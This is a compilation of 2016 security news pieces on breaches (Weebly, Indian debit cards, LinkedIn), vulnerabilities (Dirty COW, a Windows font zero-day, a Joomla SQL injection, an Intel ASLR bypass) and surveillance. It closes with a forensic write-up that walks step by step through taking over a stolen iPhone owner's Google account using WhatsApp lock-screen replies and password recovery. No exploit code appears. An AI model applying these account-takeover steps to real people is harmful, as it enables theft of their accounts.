"Unlike nearly every other hack, the Co-founder and CTO of Weebly Chris Fanini fortunately did not have his head buried deeply in the sand and actually responded to our communication requests," LeakedSource says.
"We have been working with them to ensure the security of their users meaning password resets as well as notification emails are now being sent out."
The stolen data contains personal data of 43,430,316 Weebly customers, which includes usernames, email addresses, passwords, and IP addresses.
Stolen passwords were stored using the strong hashing function "BCrypt," making it difficult for hackers to obtain user's actual password.
These password hashes also believed to have used a Salt – a random string added to the hashing process to further strengthen passwords in order to make it more difficult for hackers to crack them.
Weebly confirmed the data breach, saying the company has started notifying affected customers and already initiated password reset process and new password requirements.
"Weebly recently became aware that an unauthorized party obtained email addresses and/or usernames, IP addresses and encrypted (bcrypt hashed) passwords for a large number of customers," the company said.
"At this point, we do not have evidence of any customer website being improperly accessed. We do not store any full credit card numbers on Weebly servers, and at this time we’re not aware that any credit card information that can be used for fraudulent charges was part of this incident."
LeakedSource has also published details of a data breach affecting more than 22.5 million customers of location-based check-in service Foursquare, though the company denied the claims.
The Takeaway:
Even if stolen passwords are much difficult to crack, it's still a good idea to change the password for your Weebly account, just to be safe.
Also change passwords for other online accounts immediately, especially if you use the same password for multiple websites.
You can also use a good password manager to create and remember complex passwords for different sites. We have listed some best password managers that would help you understand the importance of password manager and choose one according to your requirement.

The new Dirty COW Linux Kernel Exploit already used in attacks in the wild
21.10.2016 securityaffairs Vulnerebility

Experts disclosed a new Linux kernel vulnerability dubbed Dirty COW that could be exploited by an unprivileged local attacker to escalate privileges.
The security expert Phil Oester discovered in the Linux kernel a new flaw, dubbed ‘Dirty COW‘ that could be exploited by a local attacker to escalate privileges.

The name “Dirty COW” is due to the fact that it’s triggered by a race condition in the way the Linux kernel’s memory subsystem handles copy-on-write (COW) breakage of private read-only memory mappings.

According to the security advisory published by Red Had, the vulnerability, tracked as CVE-2016-5195, allows local attackers to modify existing setuid files.

“A race condition was found in the way the Linux kernel’s memory subsystem handled the copy-on-write (COW) breakage of private read-only memory mappings. An unprivileged local user could use this flaw to gain write access to otherwise read-only memory mappings and thus increase their privileges on the system.” states the Red Had security advisory.

“This could be abused by an attacker to modify existing setuid files with instructions to elevate privileges. An exploit using this technique has been found in the wild.”

Dirty COW exploit

Red Hat also confirmed that attackers are using an exploit leveraging the Dirty COW in the wild.

The good news is that a solution to the issue is already available and Linux distributions have started releasing updates.

There is also a curious aspect of the Dirty COW, researchers that discovered it launched a sort of marketing operation around the issue, created a website, a logo and a Twitter account. They are also running a shop that sells “Dirty COW” mugs and t-shirts.

Let me close with one of the questions in the FAQ session of the website:

Can my antivirus detect or block this attack?

“Although the attack can happen in different layers, antivirus signatures that detect Dirty COW could be developed. Due to the attack complexity, differentiating between legitimate use and attack cannot be done easily, but the attack may be detected by comparing the size of the binary against the size of the original binary. This implies that antivirus can be programmed to detect the attack but not to block it unless binaries are blocked altogether.”

The researchers also published the exploit code on GitHub.

FruityArmor APT exploited Windows Zero-Day flaws in attacks in the wild

21.10.2016 securityaffairs APT

Experts from Kaspersky have discovered a new APT dubbed FruityArmor APT using a zero-day vulnerability patched this month by Microsoft.
A new APT group, dubbed FruityArmor, targeted activists, researchers, and individuals related to government organizations.
According to experts at Kaspersky Lab, the FruityArmor APT conducted targeted attacks leveraging on a Windows zero-day vulnerability, tracked as CVE-2016-3393, recently patched by Microsoft.

The security bulletins issued by Microsoft in October patched four zero-day flaws, including the CVE-2016-3393 one that it a remote code execution vulnerability.

FruityArmor APT zero-day

The experts have observed victims in different countries, including Iran, Algeria, Thailand, Yemen, Saudi Arabia and Sweden.

According to Kaspersky Lab, the hackers behind FruityArmor exploited several zero-day vulnerabilities and used an attack platform built around the Microsoft PowerShell framework.

“FruityArmor is perhaps a bit unusual due to the fact that it leverages an attack platform that is built entirely around PowerShell. The group’s primary malware implant is written in PowerShell and all commands from the operators are also sent in the form of PowerShell scripts.” reads a blog post published on Thursday by Kaspersky.

Another peculiarity of the group is the use of the Windows Management Instrumentation (WMI) for persistence.

The malicious code used by the APT is hard to detect, the experts from Kaspersky highlighted that its payloads run directly in memory.

According to the experts, the FruityArmor APT group exploits the zero-day flaw for privilege escalation, that combined with browser exploits allow the attackers to escape the browser sandbox.

“To achieve remote code execution on a victim’s machine, FruityArmor normally relies on a browser exploit. Since many modern browsers are built around sandboxes, a single exploit is generally not sufficient to allow full access to a targeted machine.” reads the blog post.

“In the case of FruityArmor, the initial browser exploitation is always followed by an EoP exploit. This comes in the form of a module, which runs directly in memory. The main goal of this module is to unpack a specially crafted TTF font containing the CVE-2016-3393 exploit. After unpacking, the module directly loads the code exploit from memory with the help of AddFontMemResourceEx. After successfully leveraging CVE-2016-3393, a second stage payload is executed with higher privileges to execute PowerShell with a meterpreter-style script that connects to the C&C.”

For further details give a look at the Kaspersky analysis.

Weebly data breach affected more than 43 million customers
21.10.2016 securityaffairs Crime

Weebly, a San Francisco-based Drag-n-Drop website creator, will start sending notification letters to all of their customers due to a data breach.
Another data breach is in the headlines, Weebly and Foursquare are the latest victims of the massive data breaches.

According to data breach notification site LeakedSource, hackers compromised details for over 43 Million users.

“Well known San-Francisco based “drag-n-drop” website creator Weebly.com had information on 43,430,316 users leaked from its main database in February of 2016. This database was provided to us by an anonymous source.” reads the blog post published by LeakedSource.
“Each record in this mega breach contains a username, email address, password, and IP address.”

The company confirmed the data breach, it also informed LeakedSource that it has started notifying affected customers and initiated password reset process.

LeakedSource also provided details of the cyber attack that seems to be dated back to February 2016, confirming the massive impact of the incident.

“This mega breach affects not only tens of millions of users but tens of millions of websites and with Weebly being one of the most popular hosting platforms in the world, this breach could have been far more disastrous in the wrong hands had they not strongly hashed passwords.”


Weebly stored the password with uniquely salted Bcrypt hashing making it hard for attackers to obtain user’s actual password.

“Weebly recently became aware that an unauthorized party obtained email addresses and/or usernames, IP addresses and encrypted (bcrypt hashed) passwords for a large number of customers,” the company said.

“At this point, we do not have evidence of any customer website being improperly accessed. We do not store any full credit card numbers on Weebly servers, and at this time we’re not aware that any credit card information that can be used for fraudulent charges was part of this incident.”

Weebly is the last company that joined the list of massive data breaches recently revealed, a log list that includes IT giants like LinkedIn, MySpace, VK.com, Dropbox, and Yahoo.

Massive ATM Hack Hits 3.2 Million Indian Debit Cards — Change Your PIN Now!
20.10.2016 thehackernews Hacking
India is undergoing the biggest data breaches to date with as many as 3.2 Million debit card details reportedly stolen from multiple banks and financial platforms.
The massive financial breach has hit India's biggest banks including State Bank of India (SBI), HDFC Bank, Yes Bank, ICICI Bank and Axis, and customers are advised to change their ATM PIN immediately.
Hackers allegedly used malware to compromise the Hitachi Payment Services platform — which is used to power country's ATM, point-of-sale (PoS) machines and other financial transactions — and stole details of 3.2 Million debit cards, reports The Economic Times.
Of 3.2 Million debit cards, 2.6 Million are powered by Visa or Mastercard and rest 600,000 work on top of India’s own RuPay platform.
Hacked Debit Cards Reportedly Used in China
It is not yet clear who is behind the cyber attack, but the report adds that a number of affected customers have observed unauthorized transactions made by their cards in various locations in China.
Some banks, including the country's biggest lender SBI, have announced that they'll replace compromised debit cards, while others banks, including HDFC Bank, have urged their customers to change their ATM PINs and avoid using ATMs of other banks.
The extent of damage due to breach also depends on the type of cards customers are using.
Cards which use Magnetic Stripe transmit your account number and secret PIN to merchants in a way that it could make easy for fraudsters to hack them, making these cards easier to clone.
Whereas, banks who are using EMV (Europay, MasterCard, and Visa) chip-equipped cards (better known as Chip-and-Pin cards) store your data in encrypted form and only transmit a unique code (one-time-use Token) for every transaction, making these cards more secure and lot harder to clone.
SBI Blocks and will Re-Issue 600,000 Debit Cards
SBI has blocked affected debit cards and will re-issue over 600,000 cards. Here's what SBI CTO Shiv Kumar Bhasin told the publication:
"It's a security breach, but not in our bank's systems. Many other banks also have this breach—right now and since a long time. A few ATMs have been affected by malware. When people use their card on infected switches or ATMs, there is a high probability that their data will be compromised."
Mastercard also denied that its systems were breached, issuing the following statement:
"We're aware of the data compromise event. To be clear, Mastercard's own systems have not been breached. At Mastercard, safety and security of payments are a top priority for us and we're working on the investigations with the regulators, issuers, acquirers, global and local law enforcement agencies and third party payment networks to assess the current situation."
Meanwhile, the Payments Council of India has ordered a forensic audit on the Indian bank servers to measure the damage and investigate the origin of the cyber attack. Bengaluru-based payment and security specialist SISA will conduct the forensic audit.

Windows zero-day exploit used in targeted attacks by FruityArmor APT
20.10.2016 Kaspersky Vulnerebility
A few days ago, Microsoft published the “critical” MS16-120 security bulletin with fixes for vulnerabilities in Microsoft Windows, Microsoft Office, Skype for Business, Silverlight and Microsoft Lync.

One of the vulnerabilities – CVE-2016-3393 – was reported to Microsoft by Kaspersky Lab in September 2016.


Here’s a bit of background on how this zero-day was discovered. A few of months ago, we deployed a new set of technologies in our products to identify and block zero-day attacks. These technologies proved their effectiveness earlier this year, when we discovered two Adobe Flash zero-day exploits – CVE-2016-1010 and CVE-2016-4171. Two Windows EoP exploits have also been found with the help of this technology. One is CVE-2016-0165. The other is CVE-2016-3393.

Like most zero-day exploits found in the wild today, CVE-2016-3393 is used by an APT group we call FruityArmor. FruityArmor is perhaps a bit unusual due to the fact that it leverages an attack platform that is built entirely around PowerShell. The group’s primary malware implant is written in PowerShell and all commands from the operators are also sent in the form of PowerShell scripts.

In this report we describe the vulnerability that was used by this group to elevate privileges on a victim’s machine. Please keep in mind that we will not be publishing all the details about this vulnerability because of the risk that other threat actors may use them in their attacks.

Attack chain description
To achieve remote code execution on a victim’s machine, FruityArmor normally relies on a browser exploit. Since many modern browsers are built around sandboxes, a single exploit is generally not sufficient to allow full access to a targeted machine. Most of the recent attacks we’ve seen that rely on a browser exploit are combined with an EoP exploit, which allows for a reliable sandbox escape.

In the case of FruityArmor, the initial browser exploitation is always followed by an EoP exploit. This comes in the form of a module, which runs directly in memory. The main goal of this module is to unpack a specially crafted TTF font containing the CVE-2016-3393 exploit. After unpacking, the module directly loads the code exploit from memory with the help of AddFontMemResourceEx. After successfully leveraging CVE-2016-3393, a second stage payload is executed with higher privileges to execute PowerShell with a meterpreter-style script that connects to the C&C.

EOP zero-day details
The vulnerability is located in the cjComputeGLYPHSET_MSFT_GENERAL function from the Win32k.sys system module. This function parses the cmap table and fills internal structures. The CMAP structure looks like this:


The most interesting parts of this structure are two arrays – endCount and startCount. The exploit contains the next cmap table with segments:


To compute how much memory to allocate to internal structures, the function executes this code:


After computing this number, the function allocates memory for structures in the following way:


The problem is that if we compute the entire table, we will achieve an integer overflow and the cnt variable will contain an incorrect value.

In kernel, we see the following picture:


The code allocates memory only for 0x18 InternalStruct but then there is a loop for all the segments range (this value was extracted from the file directly):


Using the cmap table, the v44 variable (index) could be controlled and, as a result, we get memory corruption. To achieve it, the attacker can do the following:

Make an integer overflow in win32k!cjComputeGLYPHSET_MSFT_GENERAL
Make a specific segment ranges in font file to access interesting memory.
What about Windows 10? As most of you know, the font processing in Windows 10 is performed in a special user mode process with restricted privileges. This is a very good solution but the code has the same bug in the TTF processing.


As a result, if you load/open this font exploit in Windows 10, you will see the crash of fontdrvhost.exe:


Kaspersky Lab detects this exploit as:

We would like to thank Microsoft for their swift response in closing this security hole.

* More information about the FruityArmor APT group is available to customers of Kaspersky Intelligence Services. Contact: intelreports@kaspersky.com

Experts devised a method to capture keystrokes during Skype calls
20.10.2016 securityaffairs Security

A group of security experts discovered that the Microsoft Skype Messaging service exposes user keystrokes during a conversation.
A group of researchers from the University of California Irvine (UCI) and two Italian Universities discovered that the popular Skype Messaging service expose user keystrokes during a call.

The researchers have devised a method to record the acoustic emanations of computer keyboards during a Skype call in order to reassemble them as a text.


The method leverage on the profiling of the user’s typing style and doesn’t request a proximity to the victim in order to capture keystrokes.

The experts devised a new keyboard acoustic eavesdropping attack based on Voice-over-IP (VoIP).

The VoIP software is able to eavesdrop acoustic emanations of pressed keystrokes and transmits them to the interlocutors involved in the VoIP call.

The attack is possible because each brand of keyboards emis distinct sounds, such as the various letters on the same keyboard. The technique presented by the researchers is able to discriminate these sounds and discover the typed text with an accuracy that depends on the knowledge of the user’s typing style.

Clearly, this attack poses a serious threat to the users’ privacy.

According to the researchers, Skype conveys enough audio information to allow attackers to reconstruct the victim’s input with an accuracy of 91.7% when it is known the target typing style.

“In fact, we show that very popular VoIP software (Skype) conveys enough audio information to reconstruct the victim’s input – keystrokes typed on the remote keyboard.” states the paper published by the experts. “In particular, our results demonstrate that, given some knowledge on the victim’s typing style and the keyboard, the attacker attains top-5 accuracy of 91.7% in guessing a random key pressed by the victim. (The accuracy goes down to still alarming 41.89% if the attacker is oblivious to both the typing style and the keyboard).”

The researchers highlighted that the attack is not effective when the victim uses a touchscreen or a and keypad.

The real element of innovation for this technique is the fact that VoIP technology allows bypassing the need to be in proximity of the victim that was requested by other techniques.

Flaw in Intel CPUs could allow to bypass ASLR defense
20.10.2016 securityaffairs Vulnerebility

A flaw in Intel chips could be exploited to launch “Side channel” attack allowing attackers bypass protection mechanism known as ASLR.
A vulnerability in the Intel’s Haswell CPUs can be exploited to bypass the anti-exploitation technology address space layout randomization (ASLR) that in implemented by all the principal operating systems.

The ASLR is a security mechanism used by operating systems to randomize the memory addresses used by key areas of processes, it makes hard for attackers to find the memory location where to inject their malicious code.

The ASLR is particularly effective against stack and heap overflows and is able to prevent arbitrary code execution triggered by any other buffer overflow vulnerability.

Three three researchers from the State University of New York at Binghamton and the University of California in Riverside have devised a method to exploit the flaw. The technique was presented this week at the 49th annual IEEE/ACM International Symposium on Microarchitecture in Taipei.

The researchers exploited the branch target buffer (BTB) to leak ASLR addresses.

The BTB is a caching mechanism used by the CPU’s branch target predictor to optimize the performance, the trio has discovered a way to trigger BTB collisions between different user processes or processes and the kernel.

“The BTB stores target addresses of recently executed branch instructions, so that those addresses can be obtained directly from a BTB lookup to fetch instructions starting at the target in the next cycle.” states the paper published by the experts. “Since the BTB is shared by several applications executing on the same core, information leakage from one application to another through the BTB side-channel is possible.”

In order to create a BTB-based side-channel, it is necessary that three conditions are satisfied.

One application has to fill a BTB entry by executing a branch instruction.
The execution time of another application running on the same core must be affected by the state of the BTB. Thi happens when both applications use the same BTB entry.
The second application must be able to detect the impact on its execution by performing time measurements.
“We call the BTB collisions created between two processes executing in the same protection domain (e.g. two user-level processes) as Same-Domain Collisions (SDC).” continues the paper.

ASLR intel-flaw

The researchers were able to successfully run the attack on a computer equipped with an Intel Haswell microarchitecture CPU and running a Linux kernel version 4.5.

The attackers were able to recover the kernel ASLR using BTB collisions in around 60 milliseconds.

The three researchers described software and hardware-based mitigations to avoid recovering of the that could prevent BTB-based side-channel attacks in the future or harden current ASLR implementations.

BTB side channel attacks are not a novelty, however, in order to bypass ASLR exploits often leverage on a second memory disclosure vulnerability present in the targeted OS or application. The method presented by the researcher is very interesting because attackers don’t need to exploit another flaw to carry on the attack.

Intel did not provide a comment to the attack.

Breaking — Russian Hacker Responsible for LinkedIn Data Breach Arrested by FBI
20.10.2016 thehackernews Crime
The alleged Russian hacker arrested by the FBI in collaboration with the Czech police is none other than the hacker who was allegedly responsible for massive 2012 data breach at LinkedIn, which affected nearly 117 Million user accounts.
Yevgeniy N, 29-year-old Russian hacker was arrested in Prague on October 5 suspected of participating in conducting cyber-attacks against the United States, according to Reuters.
Earlier it was suspected that the hacker could be involved in hacking against the Democratic National Committee (DNC), or its presidential candidate Hillary Clinton, intended to influence the presidential election.
However, the latest statement released by LinkedIn suggests that the arrest was related to a 2012 data breach at the social network that exposed emails and hashed password of nearly 117 Million users.
"We are thankful for the hard work and dedication of the FBI in its efforts to locate and capture the parties believed to be responsible for this criminal activity," LinkedIn said in a statement.
"Following the 2012 breach of LinkedIn member information, we have remained actively involved with the FBI's case to pursue those responsible."
Earlier this year, a hacker under the nickname "Peace" put on sale what claimed to be the database of 167 Million emails and hashed passwords, including 117 Million already cracked passwords, belonging to LinkedIn users.
But, it is still unclear if the arrested hacker is the same one who was selling LinkedIn data dump on the Dark Web market a few months ago.
Watch Video of Hacker's Arrest:

But if it turns out to be the same one, then it would be a jackpot for the FBI because 'Peace' is the hacker who was also responsible for selling data dumps for MySpace, Tumblr, VK.com, and Yahoo! on the dark web marketplace.
Czech police said that a court would take the decision on the hacker's extradition to the U.S., where he is facing charges for his hacking-related crimes.
We will update the story as soon as we get official confirmation from the U.S. feds.

Police Scan 117 Million Driving Licence Photos for Face Recognition Database
19.10.2016 thehackernews BigBrothers
Your driver's license photo could be scarier than it actually looks — Well, here's why:
With the help of state driver's license data, U.S. law enforcement agencies have created a huge a face-recognition database of more than 117 Million American adults that are regularly scanned in the course of police investigations.
What's even worse? Most of those people who are scanned by police without prior knowledge are law-abiding citizens.
According to a 150-page study published Tuesday by the Center for Privacy & Technology at the Georgetown University, ID photographs of more than 117 Million adult US citizens — that's about half of the US population — are now part of the "Perpetual Line-up," which can be searched using facial-recognition software.
In the past few years, Facial Recognition technology has improved enormously. Even big technology companies like Facebook have developed so powerful facial recognition software that they can even identify you in photos even when your faces are hidden.
So, why would law enforcement be left behind?
Currently, at least 26 states reportedly allow their law enforcement agencies to run face recognition searches against their driver's license databases, while dozens of local law enforcement agencies are using commercial software to scan images captured by ATM cameras and other surveillance devices.
This clearly indicates that millions of law-abiding American citizens are potentially being pulled into the dragnet, raising legal and privacy concerns about the use of this facial recognition software, the report explains.
The report calls the use of facial recognition system "highly problematic" because of its potential to identify and monitor innocent citizens. Police departments usually keep fingerprint and DNA databases, but that are typically collected from criminals or people who have been arrested, not the common public.
"Innocent people don't belong in criminal databases," said Alvaro Bedoya, the co-author of the report. "By using face recognition to scan the faces on 26 states' driver's license and ID photos, police and the FBI have basically enrolled half of all adults in a massive virtual line-up. This has never been done for fingerprints or DNA. It's uncharted and frankly dangerous territory."
Another area of concern is that out of 52 agencies that use or have used face recognition, only one — Ohio's Bureau of Criminal Investigation — has a policy in place to prevent its officers from using the software to track religious, political or other free speech activities.
Accuracy is also a strong concern because facial recognition is far from perfect, as just one leading provider of face scanning tools says its reliability rating is only 95 percent.
Meanwhile, the facial-recognition technology is reportedly less accurate when used to identify black people, women and those aged 18 to 30.
"An accurate algorithm correctly identifies a face in an ATM photo and leads police to a robber's door," the report suggests. "An inaccurate algorithm sends them to the wrong house — and could send an innocent person to jail."
The report also describes how the facial recognition technology is spreading rapidly and is almost entirely unregulated.
The findings argue the First Amendment is meant to protect "our right to express ourselves anonymously," and warn that police use of face recognition "to continuously identify anyone on the street—without individualized suspicion—could chill our basic freedoms of expression and association, particularly when face recognition is used at political protests."
In response to this report, over 50 civil liberties groups, including the American Civil Liberties Union (ACLU), delivered a letter to the Department of Justice's Civil Rights Division Tuesday asking it to investigate the expanding use of face recognition technology around the country by police.
Using facial recognition technology, "Police are free to identify and potentially track anyone even if they have no evidence that that person has done anything wrong," says ACLU's legislative counsel Neema Singh Guliani. "We do not expect that the police can identify us when we're walking into a mosque, attending an AA meeting, or when we are seeking help at a domestic violence shelter."
The unsupervised use of face recognition systems on a regular basis threatens the privacy and civil liberties of Millions, especially immigrants and people of color, according to the dozens of signatories.
For in-depth information, you can head on to the report [PDF], titled "The Perpetual Line-up: Unregulated Police Face Recognition in America."

SQL Injection zero-day in component ja-k2-filter-and-search of Joomla
19.10.2016 securityaffairs Vulnerebility
Information Security experts have discovered an SQL injection zero-day vulnerability in Joomla component ja-k2-filter-and-search.
Information Security Researchers Dimitrios Roussis and Evangelos Apostoloudis have discovered an SQL injection vulnerability in component ja-k2-filter-and-search (https://www.joomlart.com/joomla/extensions/ja-k2-search) of Joomla, a popular open-source Content Management System (CMS).

This component has been used in various Joomla sites. Through the use of the sqlmap tool a malicious user is able to gain access to the website database revealing very critical or sensitive data in some cases

This vulnerability has not been yet detected or published in any international website. In addition, the component developer has not been informed about this critical issue so that all well-known databases are updated. Therefore this vulnerability is considered as a zero-day.


Any joomla website making use of the particular component can be checked for this vulnerability through the following request.


As a result, the following error message is displayed proving the presence of vulnerability.


By using the Sqlmap and the given URL it is evident that a dump of the database can be achieved.

List of Vulnerable Sites



































Below the original post in greek language published by SecNews.gr


Ops also the Trump Organization uses insecure e-mail servers
19.10.2016 securityaffairs Security
According to a security researcher, the Trump Organization’s mail servers run on an outdated version of Microsoft Windows Server.
Hillary Clinton is over in the storm for the violation of its private email server, even Trump has used the case to attack the rival.

The irony of fate, now we are here discussing because also Trump’s staff has some problems with his email servers. According to the security researcher Kevin Beaumont, the Trump Organization’s mail servers run on Microsoft Windows Server 2003 version with Internet Information Server 6 that is no more supported by the company. The researchers also discovered that servers are configured with minimal security.

What does it mean?

Simple, they are an easy target of hackers that can access to the organization’s e-mails servers.

Visualizza l'immagine su TwitterVisualizza l'immagine su Twitter
Kevin Beaumont ✔ @GossiTheDog
Quick update on Trump corp email servers - all internet accessible, single factor auth, no MDM, Win2003, no security patching.
00:44 - 18 Ott 2016
1.283 1.283 Retweet 1.286 1.286 Mi piace
Beaumont also discovered the Organization’s Web email access page, he explained that until yesterday morning, the Trump Organization allowed Outlook Web Access logins from webmail.trumporg.com.


According to Sean Gallagher of Ars, the e-mail access page webmail.trumporg.com displays the header for Microsoft Exchange Outlook Web Access (OWA). The analysis of the page HTML source code reveals that site is using an outdated application i.e. March 2015 build of Microsoft Exchange 2007 (SP3 RU16), which is a version known to be affected by many security issues. The login page reveals that the webmail site was running Microsoft Exchange 2007.


Beaumont pointed out that the email service doesn’t use two-factor authentication.

Below the comment sent via email by a spokesperson for the Trump Organization to the Motherboard website, he seems to downplay the problem.

“The Trump Organization deploys best in class firewall and anti-vulnerability technology with constant 24/7 monitoring. Our infrastructure is vast and leverages multiple platforms which are consistently monitored and upgraded using current cyber security best practices.”

Political Cyberattacks: Senior Turkish Government Officials Affected by Advanced Malware
19.10.2016 securityaffairs Virus

Experts at ElevenPaths, a Telefonica’s cyber security unit, provided further details on political cyberattacks leveraging on advanced malicious codes.
On 19 July at 11pm Ankara time, Wikileaks published the first emails that were grabbed from the Turkish AKP. The organization led by Julian Assange, being in line with its policy on publication of secret information, also released the content of the attachments spreading the malware contained in the emails.

Erdoğan Emails wikileaks

However, many aspects of these attacks are still unknown as ElevenPaths, Telefonica’s cyber security unit, states in the recent report where the malware samples and their malicious content have been analyzed.

The Infection Vector

One of the requirements that any attacker needs to handle is to get access to a technological infrastructure that allows him to maintain control of the infected systems without being detected. In this case, after analyzing the source IP addresses of the compromised emails it has been found that the attackers leveraged vulnerable configurations on mail servers to maximize their chances of success. This way they could perform up to three different social engineering techniques with the aim of ensuring that each recipient opened the attached malicious files.

Impersonating AKP email accounts with the domain org.tr.
Using organization administration usernames as senders:
Adopting email accounts with domains that appeared to come from reliable organizations like hosting companies, operators, or other mail services.
Amongst the 2067 IP addresses which became the source of the malicious emails distributed worldwide included web servers, residential ADSLs and mail servers. The large number of IP addresses used for sending the emails, as well as the types variety and the fact that they are spread over a wide area, has served as a key element in ensuring the anonymity of the attackers.

Types of Malware used in the political cyberattacks

Mainly, downloaders (programs or scripts involved in the first phase of infection, responsible for downloading the malicious file) have been found. These downloaders were focused on downloading ransomware and banking Trojans linked to massive campaigns performed by organized cybercrime syndicates for purely monetary purposes. However, the most important aspect of the research was the identification of the use of backdoor Trojans that are usually associated with information thefts and attacks that may include lateral movements or other techniques associated with Advanced Persistent Threats.

After analyzing all the malicious attachments, several senior Turkish government officials have been identified as the target of these Trojans like Bekir Bozdağ (Ministry of Justice), Ömer Çelik (Minister of European Union Affairs), Nurettin Canikli (Deputy Prime Minister of Turkey) and Hüseyin Çelik (Minister of National Education).

Traditional Security Is Not Enough

Traditional security solutions are not enough to tackle samples which are very fresh and which could be related to targeted political cyberattacks, since they are unlikely to be found on black lists. However, defense technology against advanced malware can be the solution to threats that have a very high probability of being implemented in all kinds of entities, both corporate and governmental.

In the words of Eugene H. Spafford, a well-known computer security expert, the only truly secure system is one that is powered off, cast in a block of concrete and sealed in a lead-lined room with armed guards. And even then Eugene has his doubts. This case is another illustrative reason of why it is always important to stay alerted in regard to our own defense systems.

The ‘Sin’ Card: How criminals unlocked a stolen iPhone 6S
19.10.2016 securityaffairs Apple

Even if you have an iPhone 6S protected by a 6 digits password plus the touch ID fingerprint it is possible to unlock it.
1. Introduction

You have an iPhone 6S protected by a 6 digits password plus the touch ID fingerprint and you may think that nobody can unlock it without the code, right? Wrong! At least not, according to the incident we analyzed this week at Morphus Labs.

An iPhone 6S, exactly as described in the previous paragraph, was stolen three days ago. The victim told us that, right after the incident, the criminals did reset some of their online services passwords, like Apple ID and contacted his bank pretending to be him in an attempt to retrieve the bank account’s passwords. Fortunately, they couldn’t reach the victim’s money, but, how could they reset the Apple ID password from a locked device?

To better understand this scenario, we’ve collected more information about the victim:

a) Could it have been a targeted attack, I mean, was the thief focused on stealing that iPhone specifically? Could the thief have previously grabbed the victim’s credentials using an e-mail phishing scam or something like that?

Probably not. According to the information we collected, the iPhone was the last item that the thief asked the victim.

b) Did some ID or other documents with the victim’s information also stolen? It is important to understand if the thief knew the victim’s name or e-mail address.

No. No ID or document with the victim’s name or any other information was stolen. They just asked for money and the iPhone.

c) How long did it take to the victim to lock the iPhone and SIM card?

Approximately 2 hours after the theft.

d) Was the iPhone password “guessable”?

No. The 6 digits password wasn’t easily guessable and had no relation to the victim’s car plate number or personal information that the thief might have.

So, given this mysterious scenario, we decided to dive into the situation and understand how the victim’s iPhone was unlocked.

2. The timeline

We will now establish a timeline to organize the facts that happened last October 14th afternoon:

a) 14:00 – the theft occurred;

b) 16:03 – the victim activated the lost mode of its iPhone and asked for it to be remotely erased through iCloud;

c) 16:28 – the victim’s Google Account password was changed;

d) 16:37 – the victim received an e-mail with a link to redefine its Apple ID’s password;

e) 16:38 – a new e-mail informing the victim that the Apple ID password has been changed;

f) 16:43 – a new e-mail informing that the iPhone has been located;

g) 16:43 – a new e-mail informing that the iPhone was being erased;

So, as we can see, the victim’s Google and Apple accounts passwords were reset by the thief of the iPhone. As we all know, unlocking an iPhone without the proper credentials is a “hard to unfeasible” work. So, how did they do it?

Based on the facts that we established on the timeline, we started to work on some questions that might explain what happened:

1) To change a Google account password, you have to inform at least your login, in other words, your e-mail address. How the e-mail address might have been discovered?

Despite the fact the latest IOS version shows information and notifications even on a locked iPhone, in our simulations, nothing appeared on the screen that could give the user’s Gmail address away;

2) Is there a way to discover the Apple ID from the device’s IMEI?

We searched on the Web and found paid services that offer exactly that: “discover the Apple’s ID from a given IMEI”. But all of them inform that this isn’t an online process. It could take 24 to 48 hours for you to get the information you want. This was not the case. The whole process took around 2 hours.

3) Is there a way to discover a Gmail account based on the only information that the criminal had, that is, the phone number?

We did some search again and realized that Google offers a way to discover an e-mail address based on some given data: the phone number that you associate to your account, a name and a surname. As the phone number could be easily discovered in this scenario, discovering the name and surname from that phone number could be less than hard. We’re starting to get somewhere…

3. The hypothesis simulation

So, we decided to follow that way and try to find the name and surname of the victim from the perspective of the thief. This time, arranging our lab wasn’t a tough task. The victim bought a new iPhone 6S smartphone, configured exactly the way the stolen one was and gave to us for the purpose of this research. That way, our scenario was as close as possible to the real scenario – including the same Google and Apple accounts.

3.1. Discovering the phone number

To obtain the phone number, we removed the SIM card from the iPhone and inserted it on another phone. Similar to the real scenario, no PIN lock was in place. On the other phone, it was easy to identify the phone number.

3.2. Low-hanging fruit

Now, having the phone number, we followed the “low-hanging fruit” strategy at first. We tried to find the victim’s name putting his phone number on the Internet search engines. Unfortunately, we didn’t find anything useful.

The next approach was to look for the phone number on Facebook. We know that if you have your phone number associated to your profile, it’s easy to find you by your phone number. Once again, nothing was found.

3.3. Thinking outside the box

Nothing on the low-hanging fruit, so, time to think outside the box. Of course that there could exist different ways to find out a person name by its phone number, but we decided to insist a little more in finding it with the information we have on our hands.

So, I remembered that recently I changed my smartphone. While configuring the new one, my WhatsApp profile came with my photo – and I didn’t restore if from the backup. But I didn’t remember if it came with my profile name and I decided to see if this strategy could give us the victim’s name.

To do so, we removed the SIM card from the locked iPhone and inserted it on a second smartphone with Whatsapp installed. We followed the initial configuration, receiving the SMS and so on, but unfortunately (of fortunately), WhatsApp did not load the profile name. It brought just the profile photo and status.

Yet related to WhatsApp, a second idea came into place. You might remember that if you are in a WhatsApp group and receive a message from a person that is not in your contact list, its name appears just after its phone number (ie: 9999-9999 ~Mike Arnold). So, it would be possible to send a message from that locked iPhone to a WhatsApp group, we could get the name associated to that profile.

3.4. (Whatsapp + Locked screen notification response) hacking

So, firstly, we confirmed that the iPhone was configured to show WhatsApp notifications on the locked screen sending it a single message. The message was shown as expected. The next step was to try to answer that message from the locked iPhone. Using the “3D touch” functionality, we were able to answer that message.

Initial validations were done, time to try the group message approach. We created a group and included the contact associated with the locked iPhone’s number. As there is no validation for you to enter a new group, as we did this and a new message was shown on the locked iPhone screen informing that it is now part of that new group.

As we had to create a contact associated with the iPhone number on the smartphone that created the group, we had to include a third participant in the same group. This third participant has no contact data related to the iPhone’s number.

So, that was all set. We sent a message from one of the group participants. As expected, the message arrived on the locked iPhone screen. We answered it from the locked iPhone and, as expected again, the message sent to the third participant came associated to the iPhone’s Whatsapp profile name. Stage completed.


The next and easiest step was to put those three parameters we discovered (phone number, name and a surname) in the Google form and get the e-mail address associated with that person. Stage completed.

3.4. Changing the Google account password

Now, let’s try to replay the password change made by the criminal. The next steps were:

– Enter Google login screen;

– Choose “forget my password” option;

– Insert any text on the “last password that you remember”;

– On the next screen, Google asks for the phone number associated with the account. They only show a partial of the phone number, but the last two digits allowed us to believe we were on the right track;

– Inserting the iPhone’s phone number, Google sent to iPhone a code through SMS to be inserted on the next screen;

– After doing that, Google offered us to input a new password for that account.

At that moment, we reproduced the Google account password change by mimicking what the criminal did and started to think how easy it could be, depending on the way it was set, to change someone’s Google account password having only its phone or SIM card and its first and last name – even for some minutes (or seconds).

3.5. Changing the Apple ID password

